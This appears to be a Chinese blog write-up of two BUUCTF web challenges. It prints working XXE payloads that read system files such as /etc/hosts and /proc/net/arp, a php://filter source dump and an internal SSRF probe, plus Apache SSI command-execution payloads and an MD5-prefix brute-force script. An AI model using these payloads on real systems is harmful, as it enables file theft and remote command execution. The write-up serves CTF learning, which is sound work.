BUUCTF 31

最新推荐文章于 2024-05-10 12:02:09 发布
最新推荐文章于 2024-05-10 12:02:09 发布
阅读量289 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52431855/article/details/114212568
版权

知识点

31-1 [NCTF2019]True XML cookbook

做题思路

打开题目后发现一段代码,审计代码

发现一个文件 doLogin.php 需要用POST传输 输入得到

又是不懂的,没有头绪,又回想起来这个界面好像见过,发现和之前的一道XXE漏洞的题目类似,然而不会

由WP得知 是由 可以得知是XXE漏洞

先拿XXE漏洞poc读/flag

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
  <username>&file;</username>
  <password>hack</password>
</user>

flag并不在这里,那用PHP伪协议读一下 doLogin.php 文件 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
 <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=./doLogin.php">
 ]>
<user><username>&xxe;</username><password>&xxe;</password></user>

得到 

<?php
/**
* autor: c0ny1
* date: 2018-2-7
*/

$USERNAME = 'admin'; //账号
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; //密码
$result = null;

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');

try{
	$dom = new DOMDocument();
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
	$creds = simplexml_import_dom($dom);

	$username = $creds->username;
	$password = $creds->password;

	if($username == $USERNAME && $password == $PASSWORD){
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
	}else{
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
	}	
}catch(Exception $e){
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>

没啥用,原来xxe利用的方式还有许多,比如下面就要用到的,访问内网中的主机,先使用file读取etc/hosts的内容,这payload为

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
 <!ENTITY xxe SYSTEM "file:///etc/hosts">
 ]>
<user><username>&xxe;</username><password>&xxe;</password></user>

响应内容为

看起来就像win里面的hosts一样,应该是为了相同的目的

再读取另一个关键文件: /proc/net/arp

payload为

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
 <!ENTITY xxe SYSTEM "file:///proc/net/arp">
 ]>
<user><username>&xxe;</username><password>&xxe;</password></user>

 响应内容为

给了两个ip但是哪个才是存活ip,据wp最后都是11,试了之后还是没出来,可能是哪一步错了吧,最后没得到flag

最后再试了一下,出来了,看来是之前有问题

payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
 <!ENTITY xxe SYSTEM "http://10.85.192.11">
 ]>
<user><username>&xxe;</username><password>&xxe;</password></user>

 

31-2 [BJDCTF2020]EasySearch

做题思路

尝试登陆了一下

这题完全没有思路,除了扫描目录,可是我并不会

寻找WP

用御剑扫描到了index.php.swp

进去是一段源代码

<?php
    ob_start();
    function get_hash(){
        $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
        $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
        $content = uniqid().$random;
        return sha1($content); 
    }
    header("Content-Type: text/html;charset=utf-8");
    ***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
            ***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
            echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
    ***
    }
    ***

在这里插入图片描述

其中get_hash()函数限制了password值经过MD5加密后的前六位值等于6d0bc1,然后在public目录下创建shtml文件,并以get_hash()函数返回值作为文件名,将POST方式传入的变量username的值写入文件中。

 

首先编写Python3脚本,爆破出MD5加密后前六位为6d0bc1的密码:

import hashlib

for i in range(1, 100000000):
    res = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if res[:6] == '6d0bc1':
        print(i, res)

运行程序,得到结果: 

在这里插入图片描述

尝试使用 2020666 作为密码登陆,并使用 burpsuite 抓包

发现一个文件 Url_is_here: public/74bfe34b339a9de8d46a3b4654bb25a385fdf43d.shtml 访问该文件

回显了用户名,经WP知道是Apache SSI 远程命令执行漏洞 详情可见

题目中 username 被写入了 shtml 文件,所以将其值修改为:

<!--#exec cmd="ls"-->

当前目录没有flag,回退一下:

payload:

<!--#exec cmd="cd ../;ls"-->

查看文件 shtml,得到flag

小杌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XML实体注入
weixin_55190422的博客
09-25 478
XML实体注入 首先介绍下基础知识把 XML大体格式如下: 接下来我以一个题目讲解 首先题目已经告诉我们了这是一道关于XML的题目 那么怎么做呢 我们打开靶机发现是一个登录界面 我们审查网页源代码 发现里面还有个dologin.php类似于PHP源码。所以我们考虑BP抓包发现是个XXE漏洞Accept: application/xml, text/xml, */*; q=0.01 X-Requested-With: XMLHttpRequest 我们用这个格式payl
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
iwebsec靶场 XXE关卡通关笔记
mooyuan的博客
11-04 1612
iwebsec靶场xxe关卡通关笔记XML外部实体注入简称XXE漏洞。XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义,文档元素。内部声明是直接在XML文件内部声明的,对于安全人员来说基本没用。外部声明是引用XML以外的文件,有风险。外部实体注入可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等等。
XXE漏洞-基础篇实验过程记录及体会
lm19770429的专栏
11-18 712
实验环境用的是合天网安实验室 基础知识 1. 什么是XML xml: eXtensibleMarkup Language,可扩展标记语言,使用简单的标记来描述数据。 xml是一种非常灵活的语言,类似于HTML语言,但是并没有固定的标签,所有的标签都可以自定义,其设计的宗旨是传输数据,而不是像HTML一样显示数据。 xml不会做任何事情,它是被设计用来结构化、存储以及传输信息,也就是xml文件所携带的信息,需要被其他的语言或者程序来解析,才能发挥作用。 2....
[NCTF2019]True XML cookbook
qq_52907838的博客
08-04 2539
打开环境,看到熟悉的页面,和前面的[NCTF2019]Fake XML cookbook页面一样,应该也是XXE漏洞,这里再介绍一下XXE漏洞: XXE(XML External Entity Injection)全称为XML外部实体注入。 XML是什么? XML指可扩展标记语言(EXtensible Markup Language),其设计宗旨是传输数据,而不是显示数据,用来结构化、存储以及传输信息,它没有预定义的标签。XML 和 HTML 之间的差异是什么? 设计目的不同:XML 被设计用来传输
xxe盲注
qq_62046696的博客
03-18 818
当然除了这些,还有一种方式代替一些符号比如百分号%,参数实体的百分号%也不能出现在实体值中,这个时候我们可以用Unicode编码,%=% 也可以写做16进制 ,%=%=%外部实体+参数实体的二重调用%errorr1;%errorr;
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF部分web题目
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
虹膜图像识别matlab程序
10-09
%用霍夫曼方法对上述像素概率编码 b=fliplr(sort(b));%按降序排列 T=b; [m,n]=size(b); B=zeros(n,n-1);%空的编码表(矩阵) for i=1:n B(i,1)=T(i);%生成编码表的第一列 end r=B(i,1)+B(i-1,1);%最后两个元素相加 T(n-1)=r; T(n)=0; T=fliplr(sort(T)); t=n-1; for j=2:n-1%生成编码表的其他各列 for i=1:t B(i,j)=T(i); end K=find(T==r); B(n,j)=K(end);%从第二列开始,每列的最后一个元素记录特征元素在该列的位置 r=(B(t-1,j)+B(t,j));%最后两个元素相加 T(t-1)=r; %把相边的值排在后面 T(t)=0; %把最后一个数清空 T=fliplr(sort(T)); %重新进行降序排列 t=t-1; end END1=sym('[0,1]');%给最后一列的元素编码 END=END1; t=3; d=1;
5月10日学习记录
最新发布
weixin_74020633的博客
05-10 748
这题是关于xxe漏洞的实际应用,利用xxe漏洞的外部实体来进行ssrf探针内网的主机和[NCTF2019]Fake XML cookbook的区别就在于xxe漏洞的利用方向,一个是命令执行,一个是SSRF看题,打开环境,熟悉的登录框正常的抓包进行分析,明显的xxe漏洞开始构造,先查看xxe漏洞能不能正常利用存在xxe漏洞并且能够正常利用,我在做题时想的是直接查看flag文件报错了,说明flag这个文件不存在,也许我们在外网不能正常访问,xxe的漏洞利用就可以探针内网,尝试访问内网看看。
PHP DOMDocment与DOMPath的demo
都随它大小便吧
02-26 4130
&lt;?php $html = file_get_contents('http://www.baidu.com/'); $dom = new DOMDocument();// PHP Xml 解析DOMdocment() 文件目录为树结构 @$dom-&gt;loadhtml($html); $xpath = new DOMXPath($dom);// domxpath返回值为结点 ...
CTF XXE漏洞攻击
夏日 の blog
05-07 3756
文章目录Fake XML CookbookTrue XML CookbookISCC 未知的风险-1参考 Fake XML Cookbook F12 查看源码: function doLogin(){ var username = $("#username").val(); var password = $("#password").val(); if(username == "" || ...
[NCTF2019]Fake XML cookbook
SopRomeo的博客
05-04 2113
sql注入不行,看看源代码,将提交的数据放到了doLogin.php下 看到题目名字XML,XXE漏洞 XXE漏洞讲解 根据上面文章的例子,构造出paylaod 利用这个paylaod进行任意本地文件读取(读取flag) 打ctf打多了找flag基本上在根目录或者/var/www/html/下。 直接读取根目录下的flag <?xml version="1.0" encoding="ut...
java字符转义
zzzz76C的博客
05-02 171
之前对java字符转义这一块稍作了解,在这里理理自己主观浅显的理解 这里会谈谈字符编码的是另一种问题和转义没有关系 以下面代码做分析 System.out.println("a".length()+"b".length()); 对以上代码["a".length()+"b".length()]部分 ["]默认作为编译器的["],用来识别编译器中的字符串部分,["a".length()+"b...
2020/7/07 - [NCTF2019]True XML cookbook - xxe
抒情诗
07-08 692
我准备发两份,一份发到这里,另一份发到CSDN上面,这里的内容浏览器不好搜到,别人看不到,无趣 第二道xxe类型的题了。Content-Type: application/xml;charset=utf-8看看这熟悉的内容,好吧,第一道payload为 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE user [ <!ENTITY xxe SYSTEM "./flag.txt"> ]> <user><
windows文件读取 xxe_XXE任意文件读取(当xml解析内容有输出时)
weixin_39629269的博客
12-22 559
利用XXE漏洞读取文件参考:https://www.jianshu.com/p/4fc721398e97首先找到登录源码如下:由题目可以利用XXE漏洞读取文件先登录用Burp Suite抓包:然后构造XXE读取文件语句如下:]>&f;024b87931a03f738fff6693ce0a78c88模板:]>&f;2020&sol;2&sol;1 PHP代...
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 在buuctf wireshark题目中,黑客通过使用Wireshark抓到了管理员登陆网站时的一段流量包,并将其中的密码作为flag。解题思路是使用Wireshark打开下载的文件,然后根据题目提示,在流量包中找到管理员登陆网站时的请求,该请求方式为POST类型,可以通过过滤条件 `http.request.method==POST` 来筛选出该请求。在该请求中,可以找到管理员的密码,作为flag提交。 不过,需要注意的是,获取到的flag需要加上 `flag{}` 并进行提交。 此外,根据中的提到的方法,您也可以直接将下载的图片文件扔到WinHex中进行查看,以便寻找是否存在flag。但是,请注意在buuctf wireshark题目中的具体解题思路仍然是通过Wireshark分析流量包。 总结起来,对于buuctf wireshark题目,您需要下载Wireshark软件,打开下载的文件,并根据题目提示找到管理员登陆网站时的流量包,从中获取管理员的密码作为flag,最后在提交flag时记得加上 `flag{}`。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值